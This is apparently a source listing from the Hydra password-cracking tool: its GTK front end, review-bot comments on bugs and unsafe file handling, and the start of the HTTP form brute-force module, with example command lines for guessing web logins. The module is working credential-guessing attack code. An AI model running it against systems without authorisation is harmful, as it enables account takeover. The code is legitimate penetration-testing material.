setenv("HYDRA_PROXY_CONNECT", (char *) gtk_entry_get_text((GtkEntry *) widget2), 1);
}
/* do we need to provide user and pass? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkProxyAuth");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entProxyUser");
widget2 = lookup_widget(GTK_WIDGET(wndMain), "entProxyPass");
a = g_string_new((gchar *) gtk_entry_get_text((GtkEntry *) widget));
a = g_string_append_c(a, ':');
a = g_string_append(a, gtk_entry_get_text((GtkEntry *) widget2));
setenv("HYDRA_PROXY_AUTH", a->str, 1);
(void) g_string_free(a, TRUE);
}
}
/* get the target, or target list */
widget = lookup_widget(GTK_WIDGET(wndMain), "radioTarget1");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entTarget");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else {
options[i++] = "-M";
widget = lookup_widget(GTK_WIDGET(wndMain), "entTargetFile");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
}
/* get the service */
widget = lookup_widget(GTK_WIDGET(wndMain), "entProtocol");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
options[i] = NULL;
return i;
}
int update_statusbar() {
int i, j;
char *options[128];
guint context_id;
GtkStatusbar *statusbar;
extern guint message_id;
GString *statustext = g_string_new("hydra ");
i = hydra_get_options(options);
for (j = 1; j < i; j++) {
statustext = g_string_append(statustext, options[j]);
statustext = g_string_append_c(statustext, ' ');
}
statusbar = (GtkStatusbar *) lookup_widget(GTK_WIDGET(wndMain), "statusbar");
context_id = gtk_statusbar_get_context_id(statusbar, "status");
/* an old message in stack? */
if (message_id != 0) {
gtk_statusbar_remove(statusbar, context_id, message_id);
}
message_id = gtk_statusbar_push(statusbar, context_id, (gchar *) statustext->str);
(void) g_string_free(statustext, TRUE);
return TRUE;
}
int read_into(int fd) {
char in_buf[BUF_S];
char *passline;
char *start, *end;
int result;
GtkWidget *output;
GtkTextBuffer *outputbuf;
GtkTextIter outputiter;
if ((result = read(fd, in_buf, BUF_S - 1)) < 0) {
g_warning("%s::%i: read returned negative!", __FILE__, __LINE__);
return FALSE;
} else if (result == 0) {
return FALSE;
} else {
in_buf[result] = 0;
}
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_get_iter_at_offset(outputbuf, &outputiter, -1);
if ((passline = strstr(in_buf, "password: ")) == NULL) {
gtk_text_buffer_insert(outputbuf, &outputiter, in_buf, result);
} else {
start = in_buf;
end = in_buf;
while ((end = (strchr(end + 1, '\n'))) < passline) {
start = end;
}
if (start != in_buf) {
gtk_text_buffer_insert(outputbuf, &outputiter, in_buf, (start - in_buf + 1));
}
gtk_text_buffer_insert_with_tags_by_name(outputbuf, &outputiter, start, (end - start + 1), "bold", NULL);
if (end - in_buf - result > 0) {
gtk_text_buffer_insert(outputbuf, &outputiter, end + 1, -1);
}
}
if (strstr(in_buf, " finished at ") != NULL) {
gtk_text_buffer_insert_with_tags_by_name(outputbuf, &outputiter, "<finished>\n\n", -1, "bold", NULL);
}
if (result == BUF_S - 1) /* there might be more available, recurse baby! */
return read_into(fd);
else
return TRUE;
}
/* wait for hydra output */
static int wait_hydra_output(gpointer data) {
static int stdout_ok = TRUE, stderr_ok = TRUE;
fd_set rset;
struct timeval tv;
int result, max;
int *fd = data;
int status;
g_assert((stdout_ok == TRUE) || (stderr_ok == TRUE));
tv.tv_sec = 0;
tv.tv_usec = 0;
FD_ZERO(&rset);
max = -1;
if (stdout_ok) {
FD_SET(fd[0], &rset);
max = fd[0];
}
if (stderr_ok) {
FD_SET(fd[1], &rset);
if (-1 == max)
max = fd[1];
else
max = fd[0] > fd[1] ? fd[0] : fd[1];
}
result = select(max + 1, &rset, NULL, NULL, &tv);
if (result < 0)
g_error("wait_hydra_output: select returned negative!");
else if (result == 0)
return TRUE;
if (stdout_ok && FD_ISSET(fd[0], &rset))
stdout_ok = read_into(fd[0]);
if (stderr_ok && FD_ISSET(fd[1], &rset))
stderr_ok = read_into(fd[1]);
if (!(stdout_ok || stderr_ok)) {
waitpid(hydra_pid, &status, 0);
hydra_pid = 0;
stdout_ok = stderr_ok = TRUE;
return FALSE;
} else
return TRUE;
}
/* assumes a successfull pipe() won't set the fd's to -1 */
static void close_pipe(int *pipe) {
if (-1 != pipe[0]) {
close(pipe[0]);
pipe[0] = -1;
}
if (-1 != pipe[1]) {
close(pipe[1]);
pipe[1] = -1;
}
}
/* executes the command stored in command->elemets (which is suitable for execv())
* returns an int *pfd with file descriptors:
* pfd[0] STDOUT output of the command and
* pfd[1] STDERR output of the command
*/
int *popen_re_unbuffered(char *command) {
static int p_r[2] = { -1, -1 }, p_e[2] = {
-1, -1};
static int *pfd = NULL;
char *options[128];
hydra_pid = 0;
update_statusbar();
/* only allocate once */
if (NULL == pfd)
pfd = malloc(sizeof(int) * 2);
/* clean up from last command */
close_pipe(p_r);
close_pipe(p_e);
if (pipe(p_r) < 0 || pipe(p_e) < 0) {
g_warning("popen_rw_unbuffered: Error creating pipe!");
return NULL;
}
if ((hydra_pid = fork()) < 0) {
g_warning("popen_rw_unbuffered: Error forking!");
return NULL;
} else if (hydra_pid == 0) { /* child */
int k;
if (setpgid(getpid(), getpid()) < 0)
g_warning("popen_rw_unbuffered: setpgid() failed");
if (close(p_r[0]) < 0)
g_warning("popen_rw_unbuffered: close(p_r[0]) failed");
if (p_r[1] != STDOUT_FILENO)
if (dup2(p_r[1], STDOUT_FILENO) < 0)
g_warning("popen_rw_unbuffered: child dup2 STDOUT failed!");
if (close(p_r[1]) < 0)
g_warning("popen_rw_unbuffered: close(p_r[1]) failed");
if (close(p_e[0]) < 0)
g_warning("popen_rw_unbuffered: close(p_e[0]) failed");
if (p_e[1] != STDERR_FILENO)
if (dup2(p_e[1], STDERR_FILENO) < 0)
g_warning("popen_rw_unbuffered: child dup2 STDERR failed!");
if (close(p_e[1]) < 0)
g_warning("popen_rw_unbuffered: close(p_e[1]) failed");
(void) hydra_get_options(options);
execv(HYDRA_BIN, options);
g_warning("%s %i: popen_rw_unbuffered: execv() returned", __FILE__, __LINE__);
for (k = 0; options[k] != NULL; k++) {
g_warning("%s", options[k]);
}
gtk_main_quit();
} else { /* parent */
if (close(p_r[1]) < 0)
g_warning("popen_rw_unbuffered: close(p_r[1]) (parent) failed");
if (close(p_e[1]) < 0)
g_warning("popen_rw_unbuffered: close(p_e[1]) (parent) failed");
pfd[0] = p_r[0];
pfd[1] = p_e[0];
return pfd;
}
g_assert_not_reached();
return pfd;
}
void on_quit1_activate(GtkMenuItem * menuitem, gpointer user_data) {
gtk_main_quit();
}
void on_about1_activate(GtkMenuItem * menuitem, gpointer user_data) {
}
void on_btnStart_clicked(GtkButton * button, gpointer user_data) {
int *fd = NULL;
fd = popen_re_unbuffered(NULL);
g_timeout_add(200, wait_hydra_output, fd);
}
void on_btnStop_clicked(GtkButton * button, gpointer user_data) {
if (hydra_pid != 0) {
kill(hydra_pid, SIGTERM);
hydra_pid = 0;
}
}
void on_wndMain_destroy(GtkObject * object, gpointer user_data) {
if (hydra_pid != 0) {
kill(hydra_pid, SIGTERM);
hydra_pid = 0;
}
gtk_main_quit();
}
gboolean on_entTargetFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) {
hydra_select_file((GtkEntry *) widget, "Select target list");
gtk_widget_grab_focus(widget);
return TRUE;
}
gboolean on_entUsernameFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) {
hydra_select_file((GtkEntry *) widget, "Select username list");
gtk_widget_grab_focus(widget);
return TRUE;
}
gboolean on_entPassFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) {
hydra_select_file((GtkEntry *) widget, "Select password list");
gtk_widget_grab_focus(widget);
return TRUE;
}
gboolean on_entColonFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) {
hydra_select_file((GtkEntry *) widget, "Select colon separated user,password list");
gtk_widget_grab_focus(widget);
return TRUE;
}
void on_btnSave_clicked(GtkButton * button, gpointer user_data) {
#ifdef GTK_TYPE_FILE_CHOOSER
GtkWidget *dialog;
char *filename;
gchar *text;
int fd;
GtkWidget *output;
GtkTextBuffer *outputbuf;
GtkTextIter start;
GtkTextIter end;
dialog = gtk_file_chooser_dialog_new("Save output", (GtkWindow *) wndMain, GTK_FILE_CHOOSER_ACTION_SAVE,
GTK_STOCK_SAVE, GTK_RESPONSE_ACCEPT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL);
if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_ACCEPT) {
filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog));
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_get_start_iter(outputbuf, &start);
gtk_text_buffer_get_end_iter(outputbuf, &end);
text = gtk_text_buffer_get_text(outputbuf, &start, &end, TRUE);
fd = open(filename, O_CREAT | O_TRUNC | O_WRONLY, 0644);
if (fd > 0) {
write(fd, text, strlen(text));
close(fd);
}
g_free(text);
g_free(filename);
}
gtk_widget_destroy(dialog);
#endif
}
void on_chkColon_toggled(GtkToggleButton * togglebutton, gpointer user_data) {
GtkWidget *user, *pass;
user = lookup_widget(GTK_WIDGET(wndMain), "frmUsername");;
pass = lookup_widget(GTK_WIDGET(wndMain), "frmPass");
if (gtk_toggle_button_get_active(togglebutton)) {
gtk_widget_set_sensitive(user, FALSE);
gtk_widget_set_sensitive(pass, FALSE);
} else {
gtk_widget_set_sensitive(user, TRUE);
gtk_widget_set_sensitive(pass, TRUE);
}
}
void on_btnClear_clicked(GtkButton * button, gpointer user_data) {
GtkWidget *output;
GtkTextBuffer *outputbuf;
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_set_text(outputbuf, "", -1);
}
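
Review bot: `read_into()` can dereference a null pointer when a chunk contains "password: " with no newline after it: `strchr(end + 1, '\n')` returns NULL, the `< passline` comparison still holds, `start` becomes NULL and the next iteration calls `strchr()` on `NULL + 1`. End the loop when `strchr()` returns NULL and treat the end of the buffer as the end of the line. In the same function `end - in_buf - result > 0` can never be true, because `end` points inside the `result` bytes just read, so any output after the highlighted line is dropped. In the `snmp` branch of `hydra_get_options()` both the version and the read/write flag are written to `snmpparm[0]`, so the version is always overwritten; the second pair belongs in `snmpparm[1]`. In the child branch of `popen_re_unbuffered()` a failed `execv()` ends in `gtk_main_quit()` and then falls through to `g_assert_not_reached()`; call `_exit()` there instead, and have `on_btnStart_clicked()` check for a NULL return before passing `fd` to `g_timeout_add()`. `on_btnSave_clicked()` creates the file with mode 0644 and tests `fd > 0`; the saved text includes the "password: " lines that `read_into()` highlights, so create it with 0600, accept descriptor 0 with `fd >= 0`, and check the result of `write()`.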

27
hydra-gtk/src/callbacks.h Executable file

@ -0,0 +1,27 @@
#include <gtk/gtk.h>
int update_statusbar();
void on_quit1_activate(GtkMenuItem * menuitem, gpointer user_data);
void on_about1_activate(GtkMenuItem * menuitem, gpointer user_data);
void on_btnStart_clicked(GtkButton * button, gpointer user_data);
void on_wndMain_destroy(GtkObject * object, gpointer user_data);
void on_btnStop_clicked(GtkButton * button, gpointer user_data);
gboolean on_entTargetFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data);
gboolean on_entUsernameFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data);
gboolean on_entPassFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data);
void on_btnSave_clicked(GtkButton * button, gpointer user_data);
gboolean on_entColonFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data);
void on_chkColon_toggled(GtkToggleButton * togglebutton, gpointer user_data);
void on_btnClear_clicked(GtkButton * button, gpointer user_data);
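
Review bot: `int update_statusbar();` is an unprototyped declaration, yet main.c passes the function to `g_timeout_add()`, which expects a `gboolean (*)(gpointer)` callback; declare it as `gboolean update_statusbar(gpointer data);`, change the definition in callbacks.c to match, and pass `NULL` at the direct call in `popen_re_unbuffered()`. The header also has no include guard, and `hydra_get_options()`, `read_into()` and `popen_re_unbuffered()` are defined without `static` in callbacks.c but are not declared here; either declare them or make them `static`.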

1110
hydra-gtk/src/interface.c Executable file

File diff suppressed because it is too large

6
hydra-gtk/src/interface.h Executable file

@ -0,0 +1,6 @@
/*
* DO NOT EDIT THIS FILE - it is generated by Glade.
*/
GtkWidget *create_wndMain(void);

84
hydra-gtk/src/main.c Executable file

@ -0,0 +1,84 @@
/*
* Initial main.c file generated by Glade. Edit as required.
* Glade will not overwrite this file.
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <gtk/gtk.h>
#include <string.h>
#include "interface.h"
#include "support.h"
#include "callbacks.h"
char *hydra_path1 = "./hydra";
char *hydra_path2 = "/usr/local/bin/hydra";
char *hydra_path3 = "/usr/bin/hydra";
int main(int argc, char *argv[]) {
extern GtkWidget *wndMain;
int i;
extern guint message_id;
GtkWidget *output;
GtkTextBuffer *outputbuf;
gtk_set_locale();
gtk_init(&argc, &argv);
add_pixmap_directory(PACKAGE_DATA_DIR "/" PACKAGE "/pixmaps");
/* initialize the message id */
message_id = 0;
/* locate the hydra binary */
HYDRA_BIN = NULL;
for (i = 0; i < argc - 1; i++) {
if (!strcmp(argv[i], "--hydra-path")) {
HYDRA_BIN = argv[i + 1];
break;
}
}
if ((HYDRA_BIN != NULL) && (g_file_test(HYDRA_BIN, G_FILE_TEST_IS_EXECUTABLE))) {
/* just for obfuscation *g* */
} else if (g_file_test(hydra_path1, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path1;
} else if (g_file_test(hydra_path2, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path2;
} else if (g_file_test(hydra_path3, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path3;
} else {
g_error("Please tell me where hydra is, use --hydra-path\n");
return -1;
}
/* create window and show it */
wndMain = create_wndMain();
gtk_widget_show(wndMain);
/* if we cant use the new cool file chooser, the save button gets disabled */
#ifndef GTK_TYPE_FILE_CHOOSER
GtkWidget *btnSave;
btnSave = lookup_widget(GTK_WIDGET(wndMain), "btnSave");
gtk_widget_set_sensitive(btnSave, FALSE);
#endif
/* update the statusbar every now and then */
g_timeout_add(600, update_statusbar, NULL);
/* we want bold text in the output window */
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_create_tag(outputbuf, "bold", "weight", PANGO_WEIGHT_BOLD, NULL);
/* he ho, lets go! */
gtk_main();
return 0;
}
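
Review bot: The fallback search in main() tries `./hydra` (hydra_path1) before the two absolute paths, so starting xhydra from a directory that someone else can write to runs whatever executable named hydra sits there. Put the relative path last or drop it, and keep `--hydra-path` for non-standard installs. Two smaller things in the same block: when `--hydra-path` is given but the file is not executable, the code silently falls through to the defaults instead of reporting the bad argument, and the `return -1` after g_error() is never reached because g_error() aborts.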

120
hydra-gtk/src/support.c Executable file

@ -0,0 +1,120 @@
/*
* DO NOT EDIT THIS FILE - it is generated by Glade.
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <gtk/gtk.h>
#include "support.h"
GtkWidget *lookup_widget(GtkWidget * widget, const gchar * widget_name) {
GtkWidget *parent, *found_widget;
for (;;) {
if (GTK_IS_MENU(widget))
parent = gtk_menu_get_attach_widget(GTK_MENU(widget));
else
parent = widget->parent;
if (!parent)
parent = (GtkWidget *) g_object_get_data(G_OBJECT(widget), "GladeParentKey");
if (parent == NULL)
break;
widget = parent;
}
found_widget = (GtkWidget *) g_object_get_data(G_OBJECT(widget), widget_name);
if (!found_widget)
g_warning("Widget not found: %s", widget_name);
return found_widget;
}
static GList *pixmaps_directories = NULL;
/* Use this function to set the directory containing installed pixmaps. */
void add_pixmap_directory(const gchar * directory) {
pixmaps_directories = g_list_prepend(pixmaps_directories, g_strdup(directory));
}
/* This is an internally used function to find pixmap files. */
static gchar *find_pixmap_file(const gchar * filename) {
GList *elem;
/* We step through each of the pixmaps directory to find it. */
elem = pixmaps_directories;
while (elem) {
gchar *pathname = g_strdup_printf("%s%s%s", (gchar *) elem->data,
G_DIR_SEPARATOR_S, filename);
if (g_file_test(pathname, G_FILE_TEST_EXISTS))
return pathname;
g_free(pathname);
elem = elem->next;
}
return NULL;
}
/* This is an internally used function to create pixmaps. */
GtkWidget *create_pixmap(GtkWidget * widget, const gchar * filename) {
gchar *pathname = NULL;
GtkWidget *pixmap;
if (!filename || !filename[0])
return gtk_image_new();
pathname = find_pixmap_file(filename);
if (!pathname) {
g_warning("Couldn't find pixmap file: %s", filename);
return gtk_image_new();
}
pixmap = gtk_image_new_from_file(pathname);
g_free(pathname);
return pixmap;
}
/* This is an internally used function to create pixmaps. */
GdkPixbuf *create_pixbuf(const gchar * filename) {
gchar *pathname = NULL;
GdkPixbuf *pixbuf;
GError *error = NULL;
if (!filename || !filename[0])
return NULL;
pathname = find_pixmap_file(filename);
if (!pathname) {
g_warning("Couldn't find pixmap file: %s", filename);
return NULL;
}
pixbuf = gdk_pixbuf_new_from_file(pathname, &error);
if (!pixbuf) {
fprintf(stderr, "Failed to load pixbuf file: %s: %s\n", pathname, error->message);
g_error_free(error);
}
g_free(pathname);
return pixbuf;
}
/* This is used to set ATK action descriptions. */
void glade_set_atk_action_description(AtkAction * action, const gchar * action_name, const gchar * description) {
gint n_actions, i;
n_actions = atk_action_get_n_actions(action);
for (i = 0; i < n_actions; i++) {
if (!strcmp(atk_action_get_name(action, i), action_name))
atk_action_set_description(action, i, description);
}
}

45
hydra-gtk/src/support.h Executable file

@ -0,0 +1,45 @@
/*
* DO NOT EDIT THIS FILE - it is generated by Glade.
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <gtk/gtk.h>
/*
* Public Functions.
*/
/*
* This function returns a widget in a component created by Glade.
* Call it with the toplevel widget in the component (i.e. a window/dialog),
* or alternatively any widget in the component, and the name of the widget
* you want returned.
*/
GtkWidget *lookup_widget(GtkWidget * widget, const gchar * widget_name);
/* Use this function to set the directory containing installed pixmaps. */
void add_pixmap_directory(const gchar * directory);
/*
* Private Functions.
*/
/* This is used to create the pixmaps used in the interface. */
GtkWidget *create_pixmap(GtkWidget * widget, const gchar * filename);
/* This is used to create the pixbufs used in the interface. */
GdkPixbuf *create_pixbuf(const gchar * filename);
/* This is used to set ATK action descriptions. */
void glade_set_atk_action_description(AtkAction * action, const gchar * action_name, const gchar * description);
GtkWidget *wndMain;
char *HYDRA_BIN;
guint message_id;
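
Review bot: The last three lines, `GtkWidget *wndMain;`, `char *HYDRA_BIN;` and `guint message_id;`, define globals in a header that has no include guard, so every .c file that includes support.h gets its own tentative definition and the link only works when the compiler merges common symbols (it fails with -fno-common). Declare them `extern` here and define each once in a .c file; main.c already carries `extern` declarations for wndMain and message_id. Since the banner says the file is generated by Glade, hand-added lines would also be safer in a header that Glade does not regenerate.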

1
hydra-gtk/stamp-h.in Executable file

@ -0,0 +1 @@
timestamp

2731
hydra-gtk/xhydra.glade Executable file

File diff suppressed because it is too large

10
hydra-gtk/xhydra.gladep Executable file

@ -0,0 +1,10 @@
<?xml version="1.0" standalone="no"?> <!--*- mode: xml -*-->
<!DOCTYPE glade-project SYSTEM "http://glade.gnome.org/glade-project-2.0.dtd">
<glade-project>
<name>Hydra_gtk</name>
<program_name>xhydra</program_name>
<gnome_support>FALSE</gnome_support>
<gettext_support>FALSE</gettext_support>
<use_widget_names>TRUE</use_widget_names>
</glade-project>

691
hydra-http-form.c Normal file

@ -0,0 +1,691 @@
/*
Hydra Form Module
-----------------
The hydra form can be used to carry out a brute-force attack on simple
web-based login forms that require username and password variables via
either a GET or POST request.
The module works similarly to the HTTP basic auth module and will honour
proxy mode (with authenticaion) as well as SSL. The module can be invoked
with the service names of "http-get-form", "http-post-form",
"https-get-form" and "https-post-form".
Here's a couple of examples: -
./hydra -l "<userID>" -P pass.txt 10.221.64.12 http-post-form
"/irmlab2/testsso-auth.do:ID=^USER^&Password=^PASS^:Invalid Password"
./hydra -S -s 443 -l "<username>" -P pass.txt 10.221.64.2 https-get-form
"/irmlab1/vulnapp.php:username=^USER^&pass=^PASS^:incorrect"
The option field (following the service field) takes three ":" separated
values and an optional fourth value, the first is the page on the server
to GET or POST to, the second is the POST/GET variables (taken from either
the browser, or a proxy such as PAROS) with the varying usernames and passwords
in the "^USER^" and "^PASS^" placeholders, the third is the string that it
checks for an *invalid* or *valid* login - any exception to this is counted
as a success.
So please:
* invalid condition login should be preceded by "F="
* valid condition login should be preceded by "S=".
By default, if no header is found the condition is assume to be a fail,
so checking for *invalid* login.
The fourth optional value, can be a 'C' to define a different page to GET
initial cookies from.
If you specify the verbose flag (-v) it will show you the response from the
HTTP server which is useful for checking the result of a failed login to
find something to pattern match against.
Module initially written by Phil Robinson, IRM Plc (releases@irmplc.com),
rewritten by David Maciejak
Fix and issue with strtok use and implement 1 step location follow if HTTP
3xx code is returned (david dot maciejak at gmail dot com)
Added fail or success condition, getting cookies, and allow 5 redirections by david
*/
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
char *cond;
int success_cond = 0;
int getcookie = 1;
int auth_flag = 0;
char redirected_url_buff[2048] = "";
int redirected_flag = 0;
#define MAX_REDIRECT 8
int redirected_cpt = MAX_REDIRECT;
char cookie[4096] = "", cmiscptr[1024];
extern char *webtarget;
extern char *slash;
int webport, freemischttpform = 0;
char bufferurl[1024], cookieurl[1024] = "", userheader[1024] = "", *url, *variables, *optional1;
int strpos(char *str, char *target) {
char *res = strstr(str, target);
if (res == NULL)
return -1;
else
return res - str;
}
char *html_encode(char *string) {
char *ret = string;
if (ret == NULL)
return NULL;
if (index(ret, '%') != NULL)
ret = hydra_strrep(ret, "%", "%25");
if (index(ret, ' ') != NULL)
ret = hydra_strrep(ret, " ", "%20");
if (index(ret, '&') != NULL)
ret = hydra_strrep(ret, "&", "%26");
if (index(ret, '#') != NULL)
ret = hydra_strrep(ret, "&", "%23");
return ret;
}
/*
int analyze_server_response(int socket)
return 0 or 1 when the cond regex is matched
return -1 if no response from server
*/
int analyze_server_response(int s) {
int runs = 0;
while ((buf = hydra_receive_line(s)) != NULL) {
runs++;
//check for http redirection
if (strstr(buf, "HTTP/1.1 3") != NULL || strstr(buf, "HTTP/1.0 3") != NULL || strstr(buf, "Status: 3") != NULL) {
redirected_flag = 1;
} else if (strstr(buf, "HTTP/1.1 401") != NULL || strstr(buf, "HTTP/1.0 401") != NULL) {
auth_flag = 1;
} else if ((strstr(buf, "HTTP/1.1 403") != NULL) || (strstr(buf, "HTTP/1.1 404") != NULL) || (strstr(buf, "HTTP/1.0 403") != NULL) || (strstr(buf, "HTTP/1.0 404") != NULL)) {
return 0;
}
if (hydra_strcasestr(buf, "Location: ") != NULL) {
char *startloc, *endloc;
char str[2048];
startloc = hydra_strcasestr(buf, "Location: ") + strlen("Location: ");
strncpy(str, startloc, sizeof(str) - 1);
str[sizeof(str) - 1] = 0;
endloc = strchr(str, '\n');
if (endloc != NULL)
*endloc = 0;
endloc = strchr(str, '\r');
if (endloc != NULL)
*endloc = 0;
strcpy(redirected_url_buff, str);
}
//there can be multiple cookies
if (hydra_strcasestr(buf, "Set-Cookie: ") != NULL) {
char *cookiebuf = buf;
do {
char *startcookie, *endcookie1, *endcookie2;
char str[1024], tmpcookie[4096] = "", tmpname[128] = "", *ptr, *ptr2;
memset(str, 0, sizeof(str));
startcookie = hydra_strcasestr(cookiebuf, "Set-Cookie: ") + strlen("Set-Cookie: ");
strncpy(str, startcookie, sizeof(str) - 1);
str[sizeof(str) - 1] = 0;
endcookie1 = strchr(str, '\n');
endcookie2 = strchr(str, ';');
//terminate string after cookie data
if (endcookie1 != NULL && endcookie1 < endcookie2)
*endcookie1 = 0;
else if (endcookie2 != NULL)
*endcookie2 = 0;
// is the cookie already there? if yes, remove it!
if (index(startcookie, '=') != NULL && (ptr = index(startcookie, '=')) - startcookie + 1 <= sizeof(tmpname)) {
strncpy(tmpname, startcookie, sizeof(tmpname) - 2);
tmpname[sizeof(tmpname) - 2] = 0;
ptr = index(tmpname, '=');
*(++ptr) = 0;
// is the cookie already in the cookiejar? (so, does it have to be replaced?)
if ((ptr = hydra_strcasestr(cookie, tmpname)) != NULL) {
// yes it is.
// if the cookie is not in the beginning of the cookiejar, copy the ones before
if (ptr != cookie && *(ptr - 1) == ' ') {
strncpy(tmpcookie, cookie, ptr - cookie - 2);
tmpcookie[ptr - cookie - 2] = 0;
}
ptr += strlen(tmpname);
// if there are any cookies after this one in the cookiejar, copy them over
if ((ptr2 = strstr(ptr, "; ")) != NULL) {
ptr2 += 2;
strncat(tmpcookie, ptr2, sizeof(tmpcookie) - strlen(tmpcookie) - 1);
}
if (debug)
printf("[DEBUG] removing cookie %s in jar\n before: %s\n after: %s\n", tmpname, cookie, tmpcookie);
strcpy(cookie, tmpcookie);
}
}
ptr = index(str, '=');
// only copy the cookie if it has a value (otherwise the server wants to delete the cookie
if (ptr != NULL && *(ptr + 1) != ';' && *(ptr + 1) != 0 && *(ptr + 1) != '\n' && *(ptr + 1) != '\r') {
if (strlen(cookie) > 0)
strncat(cookie, "; ", sizeof(cookie) - strlen(cookie) - 1);
strncat(cookie, str, sizeof(cookie) - strlen(cookie) - 1);
}
cookiebuf = startcookie;
} while (hydra_strcasestr(cookiebuf, "Set-Cookie: ") != NULL);
}
#ifdef HAVE_PCRE
if (hydra_string_match(buf, cond) == 1) {
#else
if (strstr(buf, cond) != NULL) {
#endif
free(buf);
// printf("DEBUG: STRING %s FOUND!!:\n%s\n", cond, buf);
return 1;
}
// else printf("DEBUG: STRING %s NOT FOUND:\n%s\n", cond, buf);
free(buf);
}
if (runs == 0) {
if (debug)
hydra_report(stderr, "DEBUG: no response from server\n");
return -1;
}
return 0;
}
void hydra_reconnect(int s, char *ip, int port, unsigned char options) {
if (s >= 0)
s = hydra_disconnect(s);
if ((options & OPTION_SSL) == 0) {
s = hydra_connect_tcp(ip, port);
} else {
s = hydra_connect_ssl(ip, port);
}
}
int start_http_form(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char *type) {
char *empty = "";
char *login, *pass, buffer[9000], clogin[256], cpass[256];
char header[8096], *upd3variables, cuserheader[1024];
int found = !success_cond, i, j;
memset(header, 0, sizeof(header));
cookie[0] = 0; // reset cookies from potential previous attempt
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
strncpy(clogin, html_encode(login), sizeof(clogin) - 1);
clogin[sizeof(clogin) - 1] = 0;
strncpy(cpass, html_encode(pass), sizeof(cpass) - 1);
cpass[sizeof(cpass) - 1] = 0;
upd3variables = hydra_strrep(variables, "^USER^", clogin);
upd3variables = hydra_strrep(upd3variables, "^PASS^", cpass);
if (strstr(userheader, "^USER^") == NULL && strstr(userheader, "^PASS^") == NULL) {
strcpy(cuserheader, userheader);
} else { // we use the encoded version
strncpy(cuserheader, hydra_strrep(userheader, "^USER^", clogin), sizeof(cuserheader) - 1);
cuserheader[sizeof(cuserheader) - 1] = 0;
strncpy(cuserheader, hydra_strrep(cuserheader, "^PASS^", cpass), sizeof(cuserheader) - 1);
cuserheader[sizeof(cuserheader) - 1] = 0;
}
/* again: no snprintf to be portable. dont worry, buffer cant overflow */
if (use_proxy == 1 && proxy_authentication != NULL) {
// proxy with authentication
if (getcookie) {
//doing a GET to save cookies
sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla 5.0 (Hydra Proxy Auth)\r\n%s%s\r\n",
webtarget, webport, cookieurl, webtarget, proxy_authentication, header, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
i = analyze_server_response(s); // return value ignored
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %s\r\n", cookie);
}
hydra_reconnect(s, ip, port, options);
}
if (strcmp(type, "POST") == 0) {
sprintf(buffer,
"POST http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy Auth)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s",
webtarget, webport, url, webtarget, proxy_authentication, (int) strlen(upd3variables), header, cuserheader, upd3variables);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
} else {
sprintf(buffer,
"GET http://%s:%d%.600s?%s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy Auth)\r\n%s%s\r\n",
webtarget, webport, url, upd3variables, webtarget, proxy_authentication, header, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
}
} else {
if (use_proxy == 1) {
// proxy without authentication
if (getcookie) {
//doing a GET to get cookies
sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra Proxy)\r\n%s%s\r\n", webtarget, webport, cookieurl, webtarget, header,
cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
